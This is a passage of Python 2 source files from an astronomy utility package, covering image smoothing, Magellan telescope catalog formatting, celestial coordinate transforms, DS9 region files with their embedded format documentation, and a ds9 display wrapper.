ok = ok*(np.abs(ydata - med) < 4*1.48*mad)
fit = np.polynomial.polynomial.polyfit(xdata[ok], ydata[ok], order)
poly = np.polynomial.polynomial.Polynomial(fit)
if visualize:
ax.cla()
ax.plot(xdata, ydata, alpha=0.3, color='gray', marker='o')
ax.plot(xdata[ok], ydata[ok], alpha=1, color='black', marker='o', linewidth=0)
ax.plot(xdata, poly(xdata), alpha=0.3, color='red', linewidth=5)
ax.set_ylim(0, np.percentile(image[bad == 0], 95))
plt.draw()
if axis == 0:
smoothed[i,:] = poly(xdata)
else:
smoothed[:,i] = poly(xdata)
if visualize:
d.update(smoothed)
return smoothed
#a = raw_input('?')
'''smoothed = scipy.ndimage.filters.gaussian_filter(image*(bad == False), sigma=[scale,scale])
weights = scipy.ndimage.filters.gaussian_filter(np.array(bad == False).astype(np.float), sigma=[scale,scale])
smoothed /=weights
corrected = image + 0.0
corrected[bad.astype(np.bool)] = smoothed[bad.astype(np.bool)]
if visualize:
gs = plt.matplotlib.gridspec.GridSpec(1,4, wspace=0,hspace=0)
orig = plt.subplot(gs[0])
smoo = plt.subplot(gs[1], sharex=orig, sharey=orig)
weig = plt.subplot(gs[2], sharex=orig, sharey=orig)
corr = plt.subplot(gs[3], sharex=orig, sharey=orig)
kw = dict(cmap='gray', interpolation='nearest')
orig.imshow(np.log(image), **kw)
smoo.imshow(np.log(smoothed), **kw)
weig.imshow(bad, **kw)
corr.imshow(np.log(corrected), **kw)
plt.draw()
a = raw_input('test?')
return corrected'''
def estimateBackground(image, axis=-1):
display = displays.ds9('background subtraction')
display.one(image, clobber=True)
roughSky1d = np.median(image, axis)
shape = np.array(image.shape)
shape[axis] = 1
roughSkyImage = np.ones_like(image)*roughSky1d.reshape(shape)
display.one(roughSkyImage)
display.one(image - roughSkyImage)
assert(False) | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/twod.py | twod.py |
from collections import OrderedDict
import numpy as np
class CatalogEntry(object):
pass
class Magellan(CatalogEntry):
def __init__(self, star):
'''initialize a basic Magellan catalog entry, from a star object'''
self.colnames = [ 'number', # a reference number
'name', # the name of the target, no spaces
'ra', # right ascension
'dec', # declination
'equinox', # equinox of coordinates
'pmra', # in seconds of time per year (s.ss)
'pmdec', # in arcseconds per year (s.ss)
'rotatorangle', # rotator offset angle (dd.d)
'rotatormode', # rotator offset mode
'guide1_ra', # for guide star, leave 00:00:00
'guide1_dec', # for guide star, leave 00:00:00
'guide1_equinox', # for guide star, leave 2000.0
'guide2_ra', # for guide star, leave 00:00:00
'guide2_dec', # for guide star, leave 00:00:00
'guide2_equinox', # for guide star, leave 2000.0
'epoch'] # the epoch of the ra and dec, for PM
self.columns = OrderedDict()
for col in self.colnames:
self.columns[col] = None
self.star = star
self.populate()
def populate(self, epoch=2016.3):
self.columns['name'] = self.star.name.replace(' ', '')
self.columns['ra'], self.columns['dec'] = self.star.posstring(epoch, delimiter=':').split()[0:2]
self.columns['equinox'] = 2000.0
magpmra = self.star.pmra/1000.0/np.cos(self.star.icrs.dec.rad)/15.0
self.columns['pmra'] = magpmra
magpmdec = self.star.pmdec/1000.0
self.columns['pmdec'] = magpmdec
for k in ['pmra', 'pmdec']:
try:
assert(self.self.columns[k].mask == False)
except (AssertionError,AttributeError):
self.columns[k] = 0.0
print "replaced masked {0} with 0".format(k
)
# set the rotator mode to offset nothing from last position
self.columns['rotatorangle'] = 0.0
self.columns['rotatormode'] = 'OFF'
# deal with non-existant guide stars
self.columns['guide1_ra'] = '00:00:00'
self.columns['guide1_dec'] = '+00:00:00'
self.columns['guide1_equinox'] = '2000.0'
self.columns['guide2_ra'] = '00:00:00'
self.columns['guide2_dec'] = '+00:00:00'
self.columns['guide2_equinox'] = '2000.0'
self.columns['epoch'] = self.star.icrs.obstime.value
for k,v in self.star.attributes.iteritems():
self.columns[k] = v
try:
self.columns['comment']
except KeyError:
self.columns['comment'] = ''
def machine(self):
f = 'M{number:03.0f} {name:25s} {ra:10s} {dec:9s} {equinox:6.1f} {pmra:>5.2f} {pmdec:>5.2f} {rotatorangle:>6.1f} {rotatormode:3s} {guide1_ra} {guide1_dec} {guide1_equinox} {guide2_ra} {guide2_dec} {guide2_equinox} {epoch:6.1f}'
return f.format(**self.columns)
def human(self):
f = 'M{number:03.0f} {name:25s} {ra:10s} {dec:9s} # V={V:4.1f}, {comment}'
return f.format(**self.columns)
class MIKE(Magellan):
def populate(self, *args, **kwargs):
Magellan.populate(self, *args, **kwargs)
self.columns['rotatorangle'] = 0.0
self.columns['rotatormode'] = 'GRV' | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/catalogs.py | catalogs.py |
import numpy as np
import matplotlib.pyplot as plt
import astropy.io.ascii
import scipy.interpolate
import os
from ..Talker import Talker
class Relation(Talker):
'''Base class for astrophysical relations, defining tools to read tables, define methods, etc...'''
def __init__(self, filename, **kwargs):
'''Initialize a Relation object.'''
# decide if it should be chatty
Talker.__init__(self, pithy=True, **kwargs)
# store the data filename
self.filename = filename
# load the data table
self.load()
def load(self):
self.table = astropy.io.ascii.read(os.path.dirname(__file__) + '/'+ self.filename, fill_values=[('...', np.nan)] )
self.speak('loaded data from {0}'.format(self.filename))
@property
def possible(self):
return self.table.colnames
def tofrom(self, outkey, verbose=True):
# create a function that takes one input as a keyword arg
def function(inkey):
return self.interpolator(inkey=inkey, outkey=outkey)
return function
def interpolator(self, inkey=None, outkey=None):
self.speak('creating interpolator to convert {0} to {1}'.format(inkey, outkey))
try:
x = self.table[inkey]
except:
self.warning("it seems like the attempted input key {0} isn't valid".format(inkey))
return None
try:
y = self.table[outkey]
except:
self.warning("it seems like the attempted output key {0} isn't valid".format(outkey))
return None
return scipy.interpolate.interp1d(x,y, bounds_error=False, fill_value=np.nan)
def plotone(self, inkey, outkey):
try:
self.ax.cla()
except:
plt.figure('Relations Possible for '+self.__class__.__name__)
self.ax = plt.subplot()
interpolator = self.interpolator(inkey=inkey, outkey=outkey)
x = np.linspace(np.nanmin(interpolator.x), np.nanmax(interpolator.x), 100)
self.ax.plot(x, interpolator(x), alpha=0.5, color='sienna')
self.ax.plot(self.table[inkey], self.table[outkey], marker='o', alpha=0.5, color='black')
self.ax.set_xlabel(inkey)
self.ax.set_ylabel(outkey)
def plot(self):
plt.figure('Relations Possible for '+self.__class__.__name__, figsize=(len(self.possible)*8, len(self.possible)*8),dpi=30)
gs = plt.matplotlib.gridspec.GridSpec(len(self.possible), len(self.possible), wspace=0.3, hspace=0.3)
for i in range(len(self.possible)):
for j in range(len(self.possible)):
inkey = self.possible[j]
outkey = self.possible[i]
self.ax = plt.subplot(gs[i,j])
try:
self.plotone(inkey, outkey)
self.speak('plotted {0} to {1}'.format(inkey, outkey))
except:
self.speak('failed to plot {0} to {1}'.format(inkey, outkey))
self.speak('{0}/{1}'.format(i+1, len(self.possible)))
plt.savefig(self.filename + '.pdf')
plt.draw() | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/relations/Relation.py | Relation.py |
def euler(ai, bi, select=1, fk4=False):
"""
NAME:
EULER
PURPOSE:
Transform between Galactic, celestial, and ecliptic coordinates.
EXPLANATION:
Use the procedure ASTRO to use this routine interactively
CALLING SEQUENCE:
AO, BO = EULER(AI, BI, [SELECT=1, FK4=False])
INPUTS:
AI - Input Longitude in DEGREES, scalar or vector. If only two
parameters are supplied, then AI and BI will be modified to
contain the output longitude and latitude.
BI - Input Latitude in DEGREES
OPTIONAL INPUT:
SELECT - Integer (1-6) specifying type of coordinate transformation.
SELECT From To | SELECT From To
1 RA-Dec (2000) Galactic | 4 Ecliptic RA-Dec
2 Galactic RA-DEC | 5 Ecliptic Galactic
3 RA-Dec Ecliptic | 6 Galactic Ecliptic
If not supplied as a parameter or keyword, then EULER will prompt for
the value of SELECT
Celestial coordinates (RA, Dec) should be given in equinox J2000
unless the /FK4 keyword is set.
OUTPUTS:
AO - Output Longitude in DEGREES
BO - Output Latitude in DEGREES
INPUT KEYWORD:
/FK4 - If this keyword is set and non-zero, then input and output
celestial and ecliptic coordinates should be given in equinox
B1950.
/SELECT - The coordinate conversion integer (1-6) may alternatively be
specified as a keyword
NOTES:
EULER was changed in December 1998 to use J2000 coordinates as the
default, ** and may be incompatible with earlier versions***.
REVISION HISTORY:
Written W. Landsman, February 1987
Adapted from Fortran by Daryl Yentis NRL
Converted to IDL V5.0 W. Landsman September 1997
Made J2000 the default, added /FK4 keyword W. Landsman December 1998
Add option to specify SELECT as a keyword W. Landsman March 2003
"""
import numpy
twopi = 2.0e0 * numpy.pi
fourpi = 4.0e0 * numpy.pi
# J2000 coordinate conversions are based on the following constants
# (see the Hipparcos explanatory supplement).
# eps = 23.4392911111d Obliquity of the ecliptic
# alphaG = 192.85948d Right Ascension of Galactic North Pole
# deltaG = 27.12825d Declination of Galactic North Pole
# lomega = 32.93192d Galactic longitude of celestial equator
# alphaE = 180.02322d Ecliptic longitude of Galactic North Pole
# deltaE = 29.811438523d Ecliptic latitude of Galactic North Pole
# Eomega = 6.3839743d Galactic longitude of ecliptic equator
if fk4:
equinox = '(B1950)'
psi = numpy.array ([0.57595865315e0, 4.9261918136e0, 0.00000000000e0, 0.0000000000e0, 0.11129056012e0, 4.7005372834e0])
stheta = numpy.array ([0.88781538514e0, -0.88781538514e0, 0.39788119938e0, -0.39788119938e0, 0.86766174755e0, -0.86766174755e0])
ctheta = numpy.array([0.46019978478e0, 0.46019978478e0, 0.91743694670e0, 0.91743694670e0, 0.49715499774e0, 0.49715499774e0])
phi = numpy.array([4.9261918136e0, 0.57595865315e0, 0.0000000000e0, 0.00000000000e0, 4.7005372834e0, 0.11129056012e0])
else:
equinox = '(J2000)'
psi = numpy.array([0.57477043300e0, 4.9368292465e0, 0.00000000000e0, 0.0000000000e0, 0.11142137093e0, 4.71279419371e0])
stheta = numpy.array([0.88998808748e0, -0.88998808748e0, 0.39777715593e0, -0.39777715593e0, 0.86766622025e0, -0.86766622025e0])
ctheta = numpy.array([0.45598377618e0, 0.45598377618e0, 0.91748206207e0, 0.91748206207e0, 0.49714719172e0, 0.49714719172e0])
phi = numpy.array([4.9368292465e0, 0.57477043300e0, 0.0000000000e0, 0.00000000000e0, 4.71279419371e0, 0.11142137093e0])
i = select - 1
a = numpy.deg2rad(ai) - phi[i]
b = numpy.deg2rad(bi)
sb = numpy.sin(b)
cb = numpy.cos(b)
cbsa = cb * numpy.sin(a)
b = -stheta[i] * cbsa + ctheta[i] * sb
bo = numpy.rad2deg(numpy.arcsin(numpy.minimum(b, 1.0)))
del b
a = numpy.arctan2(ctheta[i] * cbsa + stheta[i] * sb, cb * numpy.cos(a))
del cb, cbsa, sb
ao = numpy.rad2deg(((a + psi[i] + fourpi) % twopi) )
return (ao, bo) | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/borrowed/crossfield.py | crossfield.py |
import string
class Regions():
def __init__(self, name, units='physical', path=''):
self.name = name
self.filename = path + self.name + '.reg'
self.regions = []
self.addHeader()
self.addUnits(units)
def addUnits(self, units='physical'):
self.units = units
def addHeader(self):
self.header = '# Region file format: DS9 version 4.1\n'
self.header += '# Filename: {0}\n'.format(self.filename)
self.header += 'global color=magenta width=2 font="helvetica 10 bold roman" select=1 highlite=1 dash=0 fixed=0 edit=1 move=1 delete=0'
def options(self, options):
line = ''
if len(options.keys()) > 0:
line += ' # '
for key, value in options.items():
if key == 'text' or key == 'font':
line += key + '=' + '{' + str(value) + '}' + ' '
else:
line += key + '=' + str(value) + ' '
return line
def addCircle(self, x, y, size=10, **kwargs):
line = self.units + "; "
line += "circle({0},{1},{2})".format(x, y, size) + self.options(kwargs)
self.regions.append(line)
def addText(self, x, y, text='bla!', size=10, **kwargs):
line = self.units + "; "
line += "text({0},{1},{2})".format(x, y, '{' + text +'}') + self.options(kwargs)
self.regions.append(line)
def addCompass(self, x, y, size=10, **kwargs):
line = "# compass({0},{1},{2}) compass=fk5 'N' 'E' 1 1".format(x, y, size) + self.options(kwargs)
self.regions.append(line)
def addBox(self, x, y, w, h, **kwargs):
line = self.units + "; "
line += "box({0},{1},{2},{3})".format(x,y,w,h) + self.options(kwargs)
self.regions.append(line)
def addLine(self, x1, y1, x2, y2, **kwargs):
line = self.units + "; "
line += "line({0},{1},{2},{3})".format( x1, y1, x2, y2) + self.options(kwargs)
self.regions.append(line)
def write(self, filename=None):
if filename is None:
filename = self.filename
f = open(filename, 'w')
f.writelines(str(self))
f.close
def __str__(self):
lines = [self.header, self.units]
lines.extend(self.regions)
return string.join(lines, '\n')
def docs(self):
print ''' Regions
Regions provide a means for marking particular areas of an image for further analysis. Regions may also be used for presentation purposes. DS9 supports a number of region descriptions, each of which may be edited, moved, rotated, displayed, saved and loaded, via the GUI and XPA.
Region Descriptions
Region Properties
Region File Format
Composite Region
Template Region
External Region Files
Region Descriptions
Circle
Usage: circle x y radius
Ellipse
Usage: ellipse x y radius radius angle
Box
Usage: box x y width height angle
Polygon
Usage: polygon x1 y1 x2 y2 x3 y3 ...
Point
Usage: point x y # point=[circle|box|diamond|cross|x|arrow|boxcircle] [size]
circle point x y
Line
Usage: line x1 y1 x2 y2 # line=[0|1] [0|1]
Vector
Usage: vector x1 y1 length angle # vector=[0|1]
Text
Usage: text x y # text={Your Text Here}
text x y {Your Text Here}
Ruler
Usage: ruler x1 y1 x2 y2 # ruler=[pixels|degrees|arcmin|arcsec]
Compass
Usage: compass x1 y1 length # compass=<coordinate system> <north label> <east label> [0|1] [0|1]
Projection
Usage: projection x1 y1 x2 y2 width
Annulus
Usage: annulus x y inner outer n=#
annulus x y r1 r2 r3...
Ellipse Annulus
Usage: ellipse x y r11 r12 r21 r22 n=# [angle]
ellipse x y r11 r12 r21 r22 r31 r32 ... [angle]
Box Annulus
Usage: box x y w1 h1 w2 h2 [angle]
box x y w1 h1 w2 h2 w3 h3 ... [angle]
Panda
Usage: panda x y startangle stopangle nangle inner outer nradius
Epanda
Usage: epanda x y startangle stopangle nangle inner outer nradius [angle]
Bpanda
Usage: bpanda x y startangle stopangle nangle inner outer nradius [angle]
Composite
Usage: # composite x y angle
Region Properties
Each region has a number of properties associated with the region, which indicates how the region is to be rendered or manipulated. Properties are defined for a region in the comment section of the region description. The exception is the Include/Exclude property. It is set via '+' or '-' preceding the region. In addition, the Line, Point, and Ruler regions have unique properties, not shared by others. Not all properties are available via the GUI or are applicable for all regions.
Text
All regions may have text associated with them. Use the text property to set the text. Strings may be quoted with " or ' or {}. For best results, use {}.
Example: circle(100,100,20) # text = {This message has both a " and ' in it}
Color
The color property specifies the color of the region when rendered. The follow 8 colors are supported:
Example: circle(100,100,20) # color = green
Dash List
Sets dashed line parameters. This does not render the region in dashed lines.
Example: circle(100,100,20) # dashlist = 8 3
Width
Sets the line width used to render the region.
Example: circle(100,100,20) # width = 2
Font
The font property specifies the font family, size, weight, and slant of any text to be displayed along with the region.
Example: circle(100,100,20) # font="times 12 bold italic"
Can Select
The Select property specifies if the user is allowed to select (hence, edit) the region via the GUI. For Regions used for catalogs and such, it is desirable that the user is unable to edit, move, or delete the region.
Example: circle(100,100,20) # select = 1
Can Highlite
The Highlite property specifies if the edit handles become visible when the region is selected.
Example: circle(100,100,20) # hightlite = 1
Dash
Render region using dashed lines using current dashlist value.
Example: circle(100,100,20) # dash = 1
Fixed in Size
The Fixed in Size property specifies that the region does not change in size as the image magnification factor changes. This allows the user to build complex pointer type regions.
Example: circle(100,100,20) # fixed = 1
Can Edit
The Edit property specifies if the user is allowed to edit the region via the GUI.
Example: circle(100,100,20) # edit = 1
Can Move
The Move property specifies if the user is allowed to move the region via the GUI.
Example: circle(100,100,20) # move = 1
Can Rotate
The Rotate property specifies if the user is allowed to rotate the region via the GUI.
Example: circle(100,100,20) # rotate = 1
Can Delete
The Delete property specifies if the user is allowed to delete the region via the GUI.
Example: circle(100,100,20) # delete = 1
Include/Exclude
The Include/Exclude properties flags the region with a boolean NOT for later analysis. Use '+' for include (default), '-' for exclude.
Example: -circle(100,100,20)
Source/Background
The Source/Background properties flag the region for use with other analysis applications. The default is source
Example: circle(100,100,20) # source
circle(200,200,10) # background
Tag
All regions may have zero or more tags associated with it, which may be used for grouping and searching.
Example: circle(100,100,20) # tag = {Group 1} tag = {Group 2}
Line
The line region may be rendered with arrows, one at each end. To indicate arrows, use the line property. A '1' indicates an arrow, '0' indicates no arrow.
Example: line(100,100,200,200) # line= 1 1
Ruler
The ruler region may display information in 'pixels', 'degrees', 'arcmin', or 'arcsec'. Use the ruler property to indicate which format to display distances in.
Example: ruler(100,100,200,200) # ruler=arcmin
Point
Point regions have an associated type and size. Use the point property to set the point type.
Example: point(100,100) # point=diamond 31
Default Properties
The default properties are:
text={}
color=green
font="helvetica 10 normal roman"
select=1
edit=1
move=1
delete=1
highlite=1
include=1
fixed=0
Region File Format
Syntax
Region arguments may be separated with either a comma or space. Optional parentheses may be used a the beginning and end of a description.
circle 100 100 10
circle(100 100 10)
circle(100,100,10)
Comments
All lines that begin with # are comments and will be ignored.
# This is a comment
Delimiter
All lines may be delimited with either a new-line or semi-colon.
circle 100 100 10
ellipse 200 200 20 40 ; box 300 300 20 40
Header
A DS9 region file may start with the following optional header:
# Region file format: DS9 version 4.0
Global Properties
Global properties affect all regions unless a local property is specified. The global keyword is first, followed by a list of keyword = value pairs. Multiple global property lines may be used within a region file.
global color=green font="helvetica 10 normal roman" edit=1 move=1 delete=1 highlite=1 include=1 wcs=wcs
Local Properties
Local properties start with a # after a region description and only affect the region it is specified with.
physical;circle(504,513,20) # color=red text={This is a Circle}
Coordinate Systems
For each region, it is important to specify the coordinate system used to interpret the region, i.e., to set the context in which the position and size values are interpreted. For this purpose, the following keywords are recognized:
PHYSICAL # pixel coords of original file using LTM/LTV
IMAGE # pixel coords of current file
FK4, B1950 # sky coordinate systems
FK5, J2000 # sky coordinate systems
GALACTIC # sky coordinate systems
ECLIPTIC # sky coordinate systems
ICRS # currently same as J2000
LINEAR # linear wcs as defined in file
AMPLIFIER # mosaic coords of original file using ATM/ATV
DETECTOR # mosaic coords of original file usingDTM/DTV
Mosaic Images
While some coordinate systems are unique across mosaic images, others coordinate systems, such as image, or physical , are valid on a per segment basis. In this case, use tile to specify which header to use in all coordinate conversions. The default is the first header, or tile 1.
Example: tile 2;fk5;point(100,100)
Multiple WCS
If an image has multiple wcs's defined, use wcs# to specify which wcs to use for all wcs references. Valid values are wcs, wcsa, wcsb, wcsc... wcsz.
Example: wcsa;linear;point(100,100) # point=diamond
Specifying Positions and Sizes
The arguments to region shapes can be floats or integers describing positions and sizes. They can be specified as pure numbers or using explicit formatting directives:
position arguments
[num] # context-dependent (see below)
[num]d # degrees
[num]r # radians
[num]p # physical pixels
[num]i # image pixels
[num]:[num]:[num] # hms for 'odd' position arguments
[num]:[num]:[num] # dms for 'even' position arguments
[num]h[num]m[num]s # explicit hms
[num]d[num]m[num]s # explicit dms
size arguments
[num] # context-dependent (see below)
[num]" # arc sec
[num]' # arc min
[num]d # degrees
[num]r # radians
[num]p # physical pixels
[num]i # image pixels
When a "pure number" (i.e. one without a format directive such as 'd' for 'degrees') is specified, its interpretation depends on the context defined by the 'coordsys' keyword. In general, the rule is:
All pure numbers have implied units corresponding to the current coordinate system.
If no such system is explicitly specified, the default system is implicitly assumed to be PHYSICAL. In practice this means that for IMAGE and PHYSICAL systems, pure numbers are pixels. Otherwise, for all systems other than linear, pure numbers are degrees. For LINEAR systems, pure numbers are in the units of the linear system. This rule covers both positions and sizes. The input values to each shape can be specified in several coordinate systems including:
IMAGE # pixel coords of current file
LINEAR # linear wcs as defined in file
FK4, B1950 # sky coordinate systems
FK5, J2000
GALACTIC
ECLIPTIC
ICRS
PHYSICAL # pixel coords of original file using LTM/LTV
AMPLIFIER # mosaic coords of original file using ATM/ATV
DETECTOR # mosaic coords of original file using DTM/DTV
WCS,WCSA-WCSZ # specify which WCS system to be used for
# linear and sky coordinate systems
If no coordinate system is specified, PHYSICAL is assumed. PHYSICAL or a World Coordinate System such as J2000 is preferred and most general. The coordinate system specifier should appear at the beginning of the region description, on a separate line (in a file), or followed by a new-line or semicolon; e.g.,
image; circle 100 100 10
physical; ellipse 200 200 10 20
fk5; point 30 50
wcsa; fk4; point 202 47
wcsp; linear; point 100 100
The use of celestial input units automatically implies WORLD coordinates of the reference image. Thus, if the world coordinate system of the reference image is J2000, then
circle 10:10:0 20:22:0 3'
is equivalent to:
j2000; circle 10:10:0 20:22:0 3'
Note that by using units as described above, you may mix coordinate systems within a region specifier; e.g.,
physical; circle 6500 9320 3'
Note that, for regions which accept a rotation angle such as:
ellipse (x, y, r1, r2, angle)
box(x, y, w, h, angle)
the angle is relative to the specified coordinate system. In particular, if the region is specified in WCS coordinates, the angle is related to the WCS system, not x/y image coordinate axis. For WCS systems with no rotation, this obviously is not an issue. However, some images do define an implicit rotation (e.g., by using a non-zero CROTA value in the WCS parameters) and for these images, the angle will be relative to the WCS axes. In such case, a region specification such as:
fk4;ellipse(22:59:43.985, +58:45:26.92,320", 160", 30)
will not, in general, be the same region specified as:
physical;ellipse(465, 578, 40, 20, 30)
even when positions and sizes match. The angle is relative to WCS axes in the first case, and relative to physical x,y axes in the second.
Composite Region
A Composite Region is a region which is a collection of other regions, which share common properties. A composite region is composed of a center point and a rotation angle, of which all its members are rendered in reference to. A composite region is defined by the # composite x y angle declaration followed by a number of regions who are or'd together. A composite region is manipulated as a single region within ds9. A composite region maybe created from the current selection of regions by selecting the Create Composite Region menu option. Likewise, a composite region can be dissolved by selecting the Dissolve Composite Region menu option.
Template Region
A Template Region is a special form of a region which is saved in a special wcs coordinate system WCS0. WCS0 indicates that the ra and dec values are relative to the current WCS location, not absolute. A template region can be loaded at any location into any fits image which contains a valid wcs. For example, a user may create a series of regions, which represent an instrument template. Then, by selecting the Save As Template menu option, a template region saved. The user may now load this templated into any other fits image which contains a valid WCS.
External Region Files
DS9 can read and write a number of region file formats. Not all formats support all the functionality of DS9 regions. Therefore, the user may loose some information when writing and then reading back from a region file in a format other that DS9. On output, the regions File Format menu or the XPA regions point is used specify the output coordinate system and format. On input, the menu or xpa point is used only for the X Y format. For all other formats, the input coordinate system is specified in the regions file itself.
Funtools
TEXT is ignored
VECTOR is ignored
PROJECTION is ignored
RULER is ignored
COMPASS is ignored
FIELD is ignored
PIE is ignored
All properties are ignored
CIAO
All point regions are translated as POINT
BOX is translated as ROTBOX
LINE is ignored
VECTOR is ignored
RULER is ignored
COMPASS is ignored
TEXT is ignored
PROJECTION is ignored
ELLIPSE ANNULUS is ignored
BOX ANNULUS is ignored
PANDA is translated as PIE
EPANDA is ignored
BPANDA is ignored
All properties are ignored
SAOimage
All point regions are translated as POINT
LINE is ignored
VECTOR is ignored
TEXT is ignored
PROJECTION ignored
PROJECTION3D is ignored
RULER is ignored
COMPASS is ignored
PANDA is ignored
EPANDA is ignored
BPANDA is ignored
All properties are ignored
IRAF PROS
All point regions are translated as POINT
LINE is ignored
VECTOR is ignored
TEXT is ignored
RULER is ignored
COMPASS is ignored
PROJECTION ignored
PROJECTION3D is ignored
PANDA is ignored
EPANDA is ignored
BPANDA is ignored
All properties are ignored
FITS REGION Binary Table
Read Only. DS9 currently can not write in this format.
POINT is translated into BOX CIRCLE POINT
ROTBOX is translated into BOX
RECTANGLE is translated into BOX
ROTRECTANGLE is translated into a BOX
PIE is translated into PANDA
The follow regions are not supported
ELLIPTANNULUS
SECTOR
DIAMOND
RHOMBUS
ROTDIAMOND
ROTRHOMBUS
X Y
This format consists of a number of coordinate pairs, one per line. The coordinate format for both input and output is specified via the Save Regions Parameters menu or XPA regions point. The first two coordinates are read, the rest of the line is ignored. The comment character '#' may be used at the beginning of line and the line is ignored. This format is very useful for reading in coordinates from other external analysis programs, such as IRAF.
Example: # this is a comment
physical # this overrides the specified coordinate system
300 300
400 400 # this is a comment ''' | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/displays/regions.py | regions.py |
from Display import *
try:
import pyds9
except ImportError:
print "Uh-oh! zachopy.display is trying to 'import pyds9' and can't seem to do it. Please install it (http://hea-www.harvard.edu/RD/pyds9/)."
import regions
class ds9(Display):
'''Use [ds9](http://hea-www.harvard.edu/saord/ds9/)
to display one or many images in an array.'''
def __init__(self,
name='general',
wait=10,
minimal=True,
xsize=300, ysize=300,
rotate=None, **kwargs):
'''initialize the ds9 display object
name = an identifier so you can point back to this
ds9 display, e.g. to refresh it later
wait = how many seconds to wait when trying to open ds9
minimial = hide all the bells and whistles
rotate = should images be rotated by default
'''
# pass kw on to Display
Display.__init__(self, **kwargs)
# make sure the name is valid
self.name = name.replace(' ','_')
# attempt to open, but don't freak out
try:
self.speak('trying to open a new ds9 window called "{0}"'.format(
self.name))
self.speak(' (will wait up to {0:.0f} seconds)'.format(wait))
self.window = pyds9.DS9(self.name,start=True,wait=wait,verify=True)
except IOError:
self.speak(' :( failed to open ds9 window "{0}"'.format(self.name))
if minimal:
self.sparse()
self.resize(xsize, ysize)
self.rotate=rotate
def sparse(self, toremove=[ 'info',
'panner',
'magnifier',
'buttons']):
'''hide most of the GUI, to save space.
toremove = list of features to remove
'''
for what in toremove:
self.window.set('view {0} no'.format(what))
def unsparse(self, toadd= [ 'info',
'panner',
'magnifier',
'buttons']):
'''show the usual GUI features.
toremove = list of features to add
'''
for what in toremove:
self.window.set('view {0} yes'.format(what))
def resize(self, xsize, ysize):
self.window.set('width {:.0f}'.format(xsize))
self.window.set('height {:.0f}'.format(ysize))
def match(self, what=['frame image', 'scale', 'colorbar']):
'''Make all the frames match the current one.'''
for w in what:
self.window.set('match {0}'.format(w))
def rgb(self, r, g, b, clobber=True, regions=None, **options):
'''Display three images as RGB in ds9.'''
if clobber:
self.clear()
self.window.set("rgb")
self.window.set("rgb red")
self.window.set_np2arr(r.astype(np.float))
self.window.set("rgb green")
self.window.set_np2arr(g.astype(np.float))
self.window.set("rgb blue")
self.window.set_np2arr(b.astype(np.float))
self.window.set("rgb red")
self.applyOptionsToFrame(**options)
def applyOptionsToFrame(self, **options):
'''send valid options to the ds9 frame.'''
# send some regions
try:
self.showRegions(options['regions'])
except KeyError:
pass
# invert the cmap
try:
if options['invert']:
self.window.set('cmap invert')
except KeyError:
pass
def showRegions(self, regions):
'''write a region file and load it to display'''
filename = 'temporary.ds9.regions.reg'
regions.write(filename)
self.window.set("regions load {0}".format(filename))
def many(self, inputimages,
depth=-1,
limit=25,
clobber=True,
single=True,
**options):
'''display a bunch of images in ds9, each in its own frame.
inputimages = 3D cube of images to display
depth = the axis corresponding to independent images
limit = maximum number of images to display
clobber = should we erase what's in this display?
single = show "single" frame (False --> "tile")
**options = additional options to apply
'''
# make sure the images are array (they could have been a list)
images = np.array(inputimages)
# clear out other frames
if clobber:
self.clear()
# set the frame display option
if single:
self.single()
else:
self.tile()
# is the "cube" really just a 1D or 2D image?
if len(images.shape) <= 2:
self.one(images, clobber=clobber)
return
# loop through the "depth" axis, which is by default the final one
if len(images.shape) == 3:
# only display up to a certain number of images
if images.shape[-1] > limit:
self.speak("going to display only {0:.0f} images, for impatience's sake".format(limit))
# display all the images
for i in range(np.minimum(images.shape[depth], limit)):
self.replace(images.take(i,axis=depth).astype(np.float), i)
self.applyOptionsToFrame(**options)
return
# if all else fails, freak out!
raise ValueError("Uh-oh! The shape {0} can't work as an image cube.")
def clear(self):
self.window.set("frame delete all")
def new(self, frame=None):
'''create a new frame'''
if frame is None:
self.window.set("frame new")
else:
self.window.set("frame {:.0f}".format(frame))
if self.rotate is not None:
self.window.set("rotate to {0}".format(self.rotate))
def one(self, image, clobber=False, frame=None, **options):
'''Display one image in ds9.
image = 2D image to display
clobber = should we erase what's in this display?
**options = additional options to apply
'''
# clear, if desired
if clobber:
self.clear()
# create a new frame for this image
self.new(frame=frame)
# fill it with the data
self.window.set_np2arr(image.astype(np.float).squeeze())
# apply the options
self.applyOptionsToFrame(**options)
def scale(self, scale=None, limits=None, mode=None ):
'''Update the scale of the image.
scale = [linear|log|pow|sqrt|squared|asinh|sinh|histequ]
limits = [<minvalue> <maxvalue>]
mode = [minmax|<value>|zscale|zmax]
'''
if scale is not None:
self.window.set('scale {0}'.format(scale))
if mode is not None:
self.window.set('scale mode {0}'.format(mode))
if limits is not None:
self.window.set('scale limits {0} {1}'.format(limits[0], limits[1]))
def tile(self, how=None):
'''tile the current frames'''
if how is not None:
self.window.set('tile {0}'.format(how))
self.window.set('tile')
def single(self):
'''show only a single frame at a time'''
self.window.set('single')
def zoom(self, how='to fit'):
'''zoom on the current image'''
self.window.set('zoom {0}'.format(how))
def replace(self, image, i):
'''Replace the image in the a specific ds9 frame with a new one.
image = the new image to show
i = which frame to replace with it
(0-indexed, so i=0 goes to ds9 frame "1")
'''
# point at the frame
self.window.set("frame {0}".format(i+1))
# set the image in that frame
self.window.set_np2arr(image.astype(np.float).squeeze())
def update(self, image):
'''Update the image in this frame with an updated one.
image = the new image to show
'''
self.window.set_np2arr(image.astype(np.float))
def saveimage(self, filename):
'''save out the current ds9 display as an image.
filename = filename, decides format based on suffix
'''
# bring the ds9 window to the front
self.window.set('raise')
# save the image
self.window.set('saveimage {0}'.format(filename)) | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/displays/ds9.py | ds9.py |
from Display import *
class imshow(Display):
'''Display 2D image with imshow.'''
def __init__(self, image, ax=None, **kwargs):
'''Initialize an imshow display, using one image to set the scale.'''
# initialize the inherited display
Display.__init__(self)
self.initialize(image, **kwargs)
@property
def label(self):
try:
assert(self.name != '')
return self.name.replace(' ','')
except:
return 'x{0:.0f}_{1:.0f}_y{2:.0f}_{3:.0f}'.format(self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1])
def update(self, image, xlabel='', ylabel='', output=None):
